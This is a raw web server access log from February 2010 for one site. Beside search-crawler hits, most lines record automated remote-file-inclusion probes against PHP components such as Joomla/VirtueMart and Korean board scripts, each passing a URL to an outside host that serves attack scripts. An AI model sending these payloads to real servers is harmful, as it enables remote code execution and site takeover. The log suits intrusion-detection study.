209.126.254.139 - - [13/Feb/2010:06:53:09 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [13/Feb/2010:06:53:11 -0800] "GET /pictures/p11/ HTTP/1.0" 302 34450 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [13/Feb/2010:06:53:12 -0800] "GET /login/needregister.php HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [13/Feb/2010:06:53:13 -0800] "GET /login/registerError.php HTTP/1.0" 200 6018 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [13/Feb/2010:06:53:13 -0800] "GET /style/PuagaDark.css HTTP/1.0" 200 2588 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [13/Feb/2010:06:53:13 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [13/Feb/2010:06:53:14 -0800] "GET /login/dtree.css HTTP/1.0" 404 5258 "http://puaga.com/login/registerError.php" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
195.184.217.50 - - [13/Feb/2010:06:53:19 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:53:41 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:53:47 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:53:47 -0800] "GET /logs/access_100127.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:53:56 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:53:59 -0800] "GET /logs/access_100127.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [13/Feb/2010:06:53:59 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:54:24 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:06:54:31 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:06:54:31 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:06:54:32 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:06:54:40 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:54:47 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:06:56:11 -0800] "GET /logs/access_100126.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:56:12 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:56:14 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:56:26 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:06:56:34 -0800] "GET /logs/access_100128.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:56:40 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:56:42 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:56:55 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:57:33 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [13/Feb/2010:06:58:00 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.mpc.ac.kr//data/list/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:06:58:12 -0800] "GET /logs/access_100127.log%20%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:06:59:24 -0800] "GET /logs/access_100203.log%20%20//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:06:59:35 -0800] "GET /logs/access_100111.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:06:59:41 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:06:59:41 -0800] "GET /logs/access_100119.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:06:59:41 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:00:22 -0800] "GET /logs/access_100208.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:00:30 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:00:30 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:00:30 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.126.254.139 - - [13/Feb/2010:07:00:37 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:01:10 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:01:20 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:01:20 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:01:20 -0800] "GET /logs/access_100208.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:01:25 -0800] "GET /logs//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:01:25 -0800] "GET /main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:01:25 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [13/Feb/2010:07:01:50 -0800] "GET /logs/access_100130.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:02:13 -0800] "GET /logs/homepage.php?sel=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:02:13 -0800] "GET /homepage.php?sel=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:02:13 -0800] "GET /logs/access_100104.log/homepage.php?sel=http://alandar.net/www2/log1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:02:55 -0800] "GET /logs/access_100123.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:02:55 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:02:55 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:07:04:49 -0800] "GET /logs/access_100129.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:07:05:00 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:07:05:02 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:07:05:02 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:07:05:14 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.207.120.69 - - [13/Feb/2010:07:06:41 -0800] "GET /logs/access_100123.log//include/lib.inc.php?site_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [13/Feb/2010:07:06:41 -0800] "GET /include/lib.inc.php?site_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
24.207.120.69 - - [13/Feb/2010:07:06:41 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:07:07:07 -0800] "GET /logs/access_100126.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:07:07:31 -0800] "GET /logs/access_100128.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [13/Feb/2010:07:08:32 -0800] "GET /logs/access_100116.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:11:24 -0800] "GET /logs/access.log//index.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:11:24 -0800] "GET /logs//index.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:11:25 -0800] "GET /index.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:12:46 -0800] "GET /logs/access_100117.log//index.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:14:43 -0800] "GET /logs/access_100127.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [13/Feb/2010:07:15:49 -0800] "GET /logs/access_100111.log//components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:07:16:15 -0800] "GET /pictures/p7/ HTTP/1.1" 302 7216 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:07:16:17 -0800] "GET /pictures/p6/ HTTP/1.1" 302 7100 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:07:16:19 -0800] "GET /pictures/p3/ HTTP/1.1" 302 12592 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
83.167.62.166 - - [13/Feb/2010:07:16:21 -0800] "GET /pictures/p9/ HTTP/1.1" 302 10336 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:07:16:23 -0800] "GET /pictures/p8/ HTTP/1.1" 302 11319 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:07:16:26 -0800] "GET /pictures/p11/ HTTP/1.1" 302 34466 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
123.143.29.250 - - [13/Feb/2010:07:17:10 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:17:10 -0800] "GET /include/bbs.lib.inc.php?site_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:17:10 -0800] "GET /logs/access_100122.log//include/bbs.lib.inc.php?site_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:17:57 -0800] "GET /logs/access_100126.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:18:19 -0800] "GET /logs/access_100123.log//include/bbs.lib.inc.php?site_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [13/Feb/2010:07:18:27 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [13/Feb/2010:07:18:27 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [13/Feb/2010:07:18:27 -0800] "GET /logs/access_100201.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:07:18:29 -0800] "GET /logs/access_100109.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [13/Feb/2010:07:18:36 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:18:47 -0800] "GET /logs//index.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:18:58 -0800] "GET /logs/access_100117.log//index.php?sayfa=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:19:21 -0800] "GET /board/bbs/delete_all.php?board_skin_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:19:21 -0800] "GET /logs/access_100125.log/board/bbs/delete_all.php?board_skin_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:19:21 -0800] "GET /logs/board/bbs/delete_all.php?board_skin_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [13/Feb/2010:07:20:05 -0800] "GET /logs/access_100127.log/board/bbs/delete_all.php?board_skin_path=http://www.biasy.net/pmnl/view.jpg/5.9v1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.167.62.166 - - [13/Feb/2010:07:20:30 -0800] "GET /simplepack/grader/index2.php HTTP/1.0" 200 8039 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:18 -0800] "GET /port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:18 -0800] "GET /logs/access_100118.log/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:19 -0800] "GET /logs/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:33 -0800] "GET /logs/access_100109.log//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:36 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:37 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:38 -0800] "GET /logs//errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:38 -0800] "GET /port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:38 -0800] "GET /logs/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:40 -0800] "GET /logs/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:40 -0800] "GET /port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:41 -0800] "GET /logs/access_100118.log%20%20/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:21:53 -0800] "GET /logs/access_100122.log%20%20//include/bbs.lib.inc.php?site_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:21:59 -0800] "GET /logs/access_100118.log/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:22:01 -0800] "GET /port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:07:22:07 -0800] "GET /logs/access_100123.log%20%20//include/bbs.lib.inc.php?site_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:07:22:08 -0800] "GET /logs/access_100118.log/port.php?content=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
